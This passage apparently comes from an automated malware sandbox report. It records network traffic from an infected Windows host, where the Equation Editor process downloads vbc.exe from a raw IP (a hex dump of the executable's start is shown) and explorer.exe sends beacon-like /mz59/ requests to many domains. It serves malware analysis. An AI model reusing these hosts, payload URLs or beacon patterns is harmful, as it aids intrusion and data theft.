Nov 26, 2020 21:17:00.400968075 CET	49168	80	192.168.2.22	184.168.131.241
Nov 26, 2020 21:17:00.401149988 CET	49168	80	192.168.2.22	184.168.131.241
Nov 26, 2020 21:17:00.565119982 CET	80	49168	184.168.131.241	192.168.2.22
Nov 26, 2020 21:17:00.610135078 CET	80	49168	184.168.131.241	192.168.2.22
Nov 26, 2020 21:17:00.610182047 CET	80	49168	184.168.131.241	192.168.2.22
Nov 26, 2020 21:17:00.610558987 CET	49168	80	192.168.2.22	184.168.131.241
Nov 26, 2020 21:17:00.610605955 CET	49168	80	192.168.2.22	184.168.131.241
Nov 26, 2020 21:17:00.774615049 CET	80	49168	184.168.131.241	192.168.2.22
Nov 26, 2020 21:17:20.852816105 CET	49169	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:17:20.869164944 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:20.869270086 CET	49169	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:17:20.869579077 CET	49169	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:17:20.886483908 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088021040 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088128090 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088161945 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088202953 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088233948 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088260889 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088284969 CET	80	49169	23.227.38.74	192.168.2.22
Nov 26, 2020 21:17:21.088422060 CET	49169	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:17:21.088470936 CET	49169	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:17:21.088476896 CET	49169	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:17:26.452354908 CET	49170	80	192.168.2.22	67.195.197.25
Nov 26, 2020 21:17:26.564409971 CET	80	49170	67.195.197.25	192.168.2.22
Nov 26, 2020 21:17:26.564549923 CET	49170	80	192.168.2.22	67.195.197.25
Nov 26, 2020 21:17:26.564904928 CET	49170	80	192.168.2.22	67.195.197.25
Nov 26, 2020 21:17:26.677014112 CET	80	49170	67.195.197.25	192.168.2.22
Nov 26, 2020 21:17:26.764904022 CET	80	49170	67.195.197.25	192.168.2.22
Nov 26, 2020 21:17:26.764951944 CET	80	49170	67.195.197.25	192.168.2.22
Nov 26, 2020 21:17:26.765239000 CET	49170	80	192.168.2.22	67.195.197.25
Nov 26, 2020 21:17:26.765356064 CET	49170	80	192.168.2.22	67.195.197.25
Nov 26, 2020 21:17:26.877541065 CET	80	49170	67.195.197.25	192.168.2.22
Nov 26, 2020 21:17:31.833060980 CET	49171	80	192.168.2.22	102.141.201.70
Nov 26, 2020 21:17:32.031294107 CET	80	49171	102.141.201.70	192.168.2.22
Nov 26, 2020 21:17:32.031456947 CET	49171	80	192.168.2.22	102.141.201.70
Nov 26, 2020 21:17:32.031821966 CET	49171	80	192.168.2.22	102.141.201.70
Nov 26, 2020 21:17:32.230328083 CET	80	49171	102.141.201.70	192.168.2.22
Nov 26, 2020 21:17:32.230701923 CET	49171	80	192.168.2.22	102.141.201.70
Nov 26, 2020 21:17:32.230904102 CET	49171	80	192.168.2.22	102.141.201.70
Nov 26, 2020 21:17:32.428842068 CET	80	49171	102.141.201.70	192.168.2.22
Nov 26, 2020 21:17:42.342360973 CET	49172	80	192.168.2.22	74.208.236.61
Nov 26, 2020 21:17:42.485449076 CET	80	49172	74.208.236.61	192.168.2.22
Nov 26, 2020 21:17:42.485665083 CET	49172	80	192.168.2.22	74.208.236.61
Nov 26, 2020 21:17:42.485991955 CET	49172	80	192.168.2.22	74.208.236.61
Nov 26, 2020 21:17:42.622852087 CET	80	49172	74.208.236.61	192.168.2.22
Nov 26, 2020 21:17:42.628258944 CET	80	49172	74.208.236.61	192.168.2.22
Nov 26, 2020 21:17:42.628302097 CET	80	49172	74.208.236.61	192.168.2.22
Nov 26, 2020 21:17:42.628319979 CET	80	49172	74.208.236.61	192.168.2.22
Nov 26, 2020 21:17:42.628552914 CET	49172	80	192.168.2.22	74.208.236.61
Nov 26, 2020 21:17:42.628671885 CET	49172	80	192.168.2.22	74.208.236.61
Nov 26, 2020 21:17:42.765465975 CET	80	49172	74.208.236.61	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2020 21:16:48.137219906 CET	52197	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:16:48.291912079 CET	53	52197	8.8.8.8	192.168.2.22
Nov 26, 2020 21:16:53.933782101 CET	53099	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:16:54.280513048 CET	53	53099	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:00.183963060 CET	52838	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:00.234890938 CET	53	52838	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:05.659591913 CET	61200	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:05.709474087 CET	53	61200	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:10.725769997 CET	49548	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:11.731065035 CET	49548	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:12.744934082 CET	49548	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:14.757503033 CET	49548	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:15.754189014 CET	53	49548	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:16.758619070 CET	53	49548	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:17.772422075 CET	53	49548	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:19.785506964 CET	53	49548	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:20.795813084 CET	55627	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:20.851593018 CET	53	55627	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:26.093291998 CET	56009	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:26.450227022 CET	53	56009	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:31.770586014 CET	61865	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:31.831497908 CET	53	61865	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:42.289381027 CET	55171	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:42.340491056 CET	53	55171	8.8.8.8	192.168.2.22
Nov 26, 2020 21:17:47.631573915 CET	52496	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:17:47.682826042 CET	53	52496	8.8.8.8	192.168.2.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 26, 2020 21:17:16.761615992 CET	192.168.2.22	8.8.8.8	d007	(Port unreachable)	Destination Unreachable
Nov 26, 2020 21:17:17.772731066 CET	192.168.2.22	8.8.8.8	d007	(Port unreachable)	Destination Unreachable
Nov 26, 2020 21:17:19.785660982 CET	192.168.2.22	8.8.8.8	d007	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 26, 2020 21:16:48.137219906 CET	192.168.2.22	8.8.8.8	0x708c	Standard query (0)	www.hostingbisniz.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:16:53.933782101 CET	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.8no3.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:00.183963060 CET	192.168.2.22	8.8.8.8	0xccff	Standard query (0)	www.cna-notary.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:05.659591913 CET	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.vandelayind.net	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:10.725769997 CET	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.macijanie.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:11.731065035 CET	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.macijanie.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:12.744934082 CET	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.macijanie.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:14.757503033 CET	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.macijanie.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:20.795813084 CET	192.168.2.22	8.8.8.8	0x6ec7	Standard query (0)	www.tennessyherb.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:26.093291998 CET	192.168.2.22	8.8.8.8	0xf09a	Standard query (0)	www.bestpodstudio.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:31.770586014 CET	192.168.2.22	8.8.8.8	0x4b92	Standard query (0)	www.xjcg168.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:42.289381027 CET	192.168.2.22	8.8.8.8	0x4b93	Standard query (0)	www.pellatrap.net	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:47.631573915 CET	192.168.2.22	8.8.8.8	0x9e1c	Standard query (0)	www.thejakx.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 26, 2020 21:16:48.291912079 CET	8.8.8.8	192.168.2.22	0x708c	No error (0)	www.hostingbisniz.com	hostingbisniz.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:16:48.291912079 CET	8.8.8.8	192.168.2.22	0x708c	No error (0)	hostingbisniz.com		209.126.13.151	A (IP address)	IN (0x0001)
Nov 26, 2020 21:16:54.280513048 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.8no3.com		156.235.143.6	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:00.234890938 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	www.cna-notary.com	cna-notary.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:17:00.234890938 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	cna-notary.com		184.168.131.241	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:05.709474087 CET	8.8.8.8	192.168.2.22	0x2f03	Name error (3)	www.vandelayind.net	none	none	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:15.754189014 CET	8.8.8.8	192.168.2.22	0x3c4e	Server failure (2)	www.macijanie.com	none	none	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:16.758619070 CET	8.8.8.8	192.168.2.22	0x3c4e	Server failure (2)	www.macijanie.com	none	none	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:17.772422075 CET	8.8.8.8	192.168.2.22	0x3c4e	Server failure (2)	www.macijanie.com	none	none	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:19.785506964 CET	8.8.8.8	192.168.2.22	0x3c4e	Server failure (2)	www.macijanie.com	none	none	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:20.851593018 CET	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	www.tennessyherb.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:17:20.851593018 CET	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:26.450227022 CET	8.8.8.8	192.168.2.22	0xf09a	No error (0)	www.bestpodstudio.com	sbsfe-p11r.geo.mf0.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:17:26.450227022 CET	8.8.8.8	192.168.2.22	0xf09a	No error (0)	sbsfe-p11r.geo.mf0.yahoodns.net		67.195.197.25	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:31.831497908 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	www.xjcg168.com	xjcg168.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:17:31.831497908 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	xjcg168.com		102.141.201.70	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:42.340491056 CET	8.8.8.8	192.168.2.22	0x4b93	No error (0)	www.pellatrap.net		74.208.236.61	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:42.340491056 CET	8.8.8.8	192.168.2.22	0x4b93	No error (0)	www.pellatrap.net		192.168.1.12	A (IP address)	IN (0x0001)
Nov 26, 2020 21:17:47.682826042 CET	8.8.8.8	192.168.2.22	0x9e1c	No error (0)	www.thejakx.com	propage.beatstars.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:17:47.682826042 CET	8.8.8.8	192.168.2.22	0x9e1c	No error (0)	propage.beatstars.com		52.206.159.80	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

192.227.129.22

www.hostingbisniz.com

www.8no3.com

www.cna-notary.com

www.tennessyherb.com

www.bestpodstudio.com

www.xjcg168.com

www.pellatrap.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	192.227.129.22	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:16:00.744925022 CET	0	OUT	GET /vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.227.129.22 Connection: Keep-Alive
Nov 26, 2020 21:16:00.866168022 CET	1	IN	HTTP/1.1 200 OK Date: Fri, 27 Nov 2020 03:15:59 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34 Last-Modified: Thu, 26 Nov 2020 22:38:57 GMT ETag: "7dc00-5b50a35a0744f" Accept-Ranges: bytes Content-Length: 515072 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c ca bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 07 00 00 0a 00 00 00 00 00 00 d6 ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ee 07 00 4f 00 00 00 00 00 08 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 00 08 00 00 08 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 da 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 a8 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 00 02 00 01 00 0a 0b 00 08 00 00 00 00 13 30 05 00 34 00 00 00 02 00 00 11 00 72 01 00 00 70 28 0d 00 00 06 0a 02 02 fe 06 09 00 00 06 73 c2 00 00 06 7d 01 00 00 04 02 1f 0d 02 7b 01 00 00 04 06 16 28 0a 00 00 06 7d 08 00 00 04 2a 3a 00 02 7b 08 00 00 04 28 0b 00 00 06 26 2a 00 13 30 04 00 c0 00 00 00 03 00 00 11 00 03 16 fe 04 16 fe 01 0a 06 39 9c 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_0 @ @@O H.text `.rsrc@@.reloc @BHH0){(t\|(+30){(t\|(+30){(t\|(+30){(t\|(+3s}~}((0((04rp(s}{(}:{(&09
Nov 26, 2020 21:16:00.866190910 CET	3	IN	Data Raw: 05 7b b3 00 00 04 0b 02 7b 07 00 00 04 07 6f 1c 00 00 0a 0c 08 39 80 00 00 00 00 07 73 1d 00 00 0a 0d 04 20 00 01 00 00 2e 08 04 20 04 01 00 00 33 0b 02 7b 09 00 00 04 14 fe 03 2b 01 16 13 04 11 04 2c 12 00 02 7b 09 00 00 04 02 09 6f 1e 00 00 0a Data Ascii: {{o9s . 3{+,{o+2 . 3{+,{oo,+{(+*0~o o!,rpr3p("&8\s#%r
Nov 26, 2020 21:16:00.866204023 CET	4	IN	Data Raw: 00 70 28 2f 00 00 0a 2c 0d 09 72 c5 00 00 70 28 2f 00 00 0a 2b 01 16 13 07 11 07 2c 23 00 72 cf 00 00 70 72 3f 01 00 70 16 1f 10 28 22 00 00 0a 26 08 6f 30 00 00 0a 00 16 13 05 38 ad 00 00 00 09 72 b9 00 00 70 28 48 00 00 0a 13 08 11 08 2c 09 00 Data Ascii: p(/,rp(/+,#rpr?p("&o08rp(H,8sIsJ+ioKrp(H,+Krpo4rp(;(H,++oL(M,oNoO++oP+*
Nov 26, 2020 21:16:00.866215944 CET	5	IN	Data Raw: 00 04 6f 5a 00 00 0a 02 7b 1a 00 00 04 6f 5a 00 00 0a 02 7b 16 00 00 04 6f 5a 00 00 0a 02 7b 19 00 00 04 6f 5a 00 00 0a 28 29 00 00 06 16 fe 01 0c 08 2c 05 38 8b 01 00 00 06 02 7b 22 00 00 04 6f 60 00 00 0a 02 7b 13 00 00 04 6f 61 00 00 0a 7d b8 Data Ascii: oZ{oZ{oZ{oZ(),8{"o`{oa}{obr2poc{ oZof{obrHpoc{oZof{obr\poc{oZof{obrhpoc{oZof~
Nov 26, 2020 21:16:00.984383106 CET	7	IN	Data Raw: 0a 73 77 00 00 0a 0a 73 78 00 00 0a 0b 02 73 79 00 00 0a 7d 16 00 00 04 02 73 7a 00 00 0a 7d 17 00 00 04 02 73 7a 00 00 0a 7d 18 00 00 04 02 73 79 00 00 0a 7d 19 00 00 04 02 73 79 00 00 0a 7d 1a 00 00 04 02 73 7b 00 00 0a 7d 1b 00 00 04 02 73 7a Data Ascii: swsxsy}sz}sz}sy}sy}s{}sz}s{}sz}s{}sy} s{}!s\|}"s}}#s}}$s}}%s}}&s{}'s{}({"o~{#o
Nov 26, 2020 21:16:00.984409094 CET	8	IN	Data Raw: 7b 24 00 00 04 6f 92 00 00 0a 02 7b 18 00 00 04 16 18 6f 93 00 00 0a 00 02 7b 24 00 00 04 6f 92 00 00 0a 02 7b 17 00 00 04 16 19 6f 93 00 00 0a 00 02 7b 24 00 00 04 6f 92 00 00 0a 02 7b 25 00 00 04 17 1a 6f 93 00 00 0a 00 02 7b 24 00 00 04 6f 92 Data Ascii: {$o{o{$o{o{$o{%o{$o{&o{$r6po{%rNpo{%o{o{%o{!o{%o{o{%o{o{%rN
Nov 26, 2020 21:16:00.985613108 CET	10	IN	Data Raw: 00 04 02 73 79 00 00 0a 7d 2f 00 00 04 02 28 7f 00 00 0a 00 02 7b 2a 00 00 04 17 6f aa 00 00 0a 00 02 7b 2a 00 00 04 1f 0c 20 f1 00 00 00 73 ab 00 00 0a 6f ac 00 00 0a 00 02 7b 2a 00 00 04 72 96 0a 00 70 6f 81 00 00 0a 00 02 7b 2a 00 00 04 20 db Data Ascii: sy}/({o{ so{rpo{ so{*o{+o{+so{+rpo{+ so{+o{, so{,rpo
Nov 26, 2020 21:16:00.985630035 CET	11	IN	Data Raw: 6f bc 00 00 0a 18 22 00 00 c8 41 73 bd 00 00 0a 6f be 00 00 0a 26 02 7b 32 00 00 04 6f 92 00 00 0a 02 7b 31 00 00 04 17 17 6f 93 00 00 0a 00 02 7b 32 00 00 04 1b 6f b8 00 00 0a 00 02 7b 32 00 00 04 16 16 73 ab 00 00 0a 6f ac 00 00 0a 00 02 7b 32 Data Ascii: o"Aso&{2o{1o{2o{2so{2rpo{2o{2o"Aso&{2o"HBso&{2o"Aso&{2 so{2o"@"`
Nov 26, 2020 21:16:00.985641956 CET	12	IN	Data Raw: 72 0a 0c 00 70 6f 81 00 00 0a 00 02 7b 35 00 00 04 1f 1f 1f 11 73 ad 00 00 0a 6f ae 00 00 0a 00 02 7b 35 00 00 04 17 6f af 00 00 0a 00 02 7b 35 00 00 04 17 6f d7 00 00 0a 00 02 7b 35 00 00 04 72 16 0d 00 70 6f 65 00 00 0a 00 02 7b 35 00 00 04 17 Data Ascii: rpo{5so{5o{5o{5rpoe{5o{6o{6Cso{6r$po{6so{6o{6o{6rpoe{6o{7o{5o{7
Nov 26, 2020 21:16:00.985656977 CET	14	IN	Data Raw: 00 0a 00 02 7b 37 00 00 04 16 6f 9b 00 00 0a 00 02 7b 37 00 00 04 6f 9c 00 00 0a 00 02 7b 38 00 00 04 16 6f 9b 00 00 0a 00 02 7b 38 00 00 04 6f 9c 00 00 0a 00 02 16 28 9b 00 00 0a 00 2a 5e 02 14 7d 3e 00 00 04 02 28 52 00 00 0a 00 00 02 28 48 00 Data Ascii: {7o{7o{8o{8o(^}>(R(H0+,{>+,{>o=(v*0]("@"PAs(( l s(rp(rpoe(
Nov 26, 2020 21:16:00.985671043 CET	15	IN	Data Raw: 70 6f e5 00 00 0a 72 e8 02 00 70 28 2f 00 00 0a 13 08 11 08 2c 25 02 7b 65 00 00 04 28 e4 00 00 0a 72 a6 0e 00 70 6f e5 00 00 0a 28 e9 00 00 0a 28 ea 00 00 0a 6f eb 00 00 0a 00 28 e4 00 00 0a 72 c0 0e 00 70 6f e5 00 00 0a 72 e8 02 00 70 28 2f 00 Data Ascii: porp(/,%{e(rpo((o(rporp(/,'{\(rpo((o(rporp(/,'{](rpo((o(rporp(/, {_(r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	209.126.13.151	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:16:48.440181971 CET	535	OUT	GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww== HTTP/1.1 Host: www.hostingbisniz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:16:48.929755926 CET	535	IN	HTTP/1.1 301 Moved Permanently Connection: close X-Powered-By: PHP/7.2.33 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.hostingbisniz.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww== Content-Length: 0 Date: Thu, 26 Nov 2020 20:16:48 GMT Server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	156.235.143.6	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:16:54.608463049 CET	536	OUT	GET /mz59/?u2M0SF6h=6o65y5aQ3K5IIOIZSpB7cm3zMzY8A11b3Xh1T1GzD81isrOpTqP8VmdELK0Vgou9N3EQzw==&rFN0=Xrx4qn HTTP/1.1 Host: www.8no3.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:16:55.174544096 CET	537	IN	HTTP/1.1 200 OK Date: Thu, 26 Nov 2020 20:16:54 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html;charset=utf-8 Data Raw: 31 35 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6b 68 6f 77 74 2e 63 6f 6d 2f 78 71 69 61 6e 67 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 72 65 6c 3d 22 65 78 74 65 72 6e 61 6c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 27 2f 27 3e e6 ac a7 e5 ae 9d e4 bd 93 e8 82 b2 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 7a 35 39 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 152<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title><script src="http://khowt.com/xqiang.js" type="text/javascript" rel="external nofollow"></script> </head><body><h1><a href='/'></a></h1><h1>Not Found</h1><p>The requested URL /mz59/ was not found on this server.</p></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49168	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:17:00.401149988 CET	537	OUT	GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA== HTTP/1.1 Host: www.cna-notary.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:17:00.610135078 CET	538	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Thu, 26 Nov 2020 20:17:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://www.facebook.com/CNA-Notary-106238414638500/publishing_tools/?refSource=pages_manager_bar Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49169	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
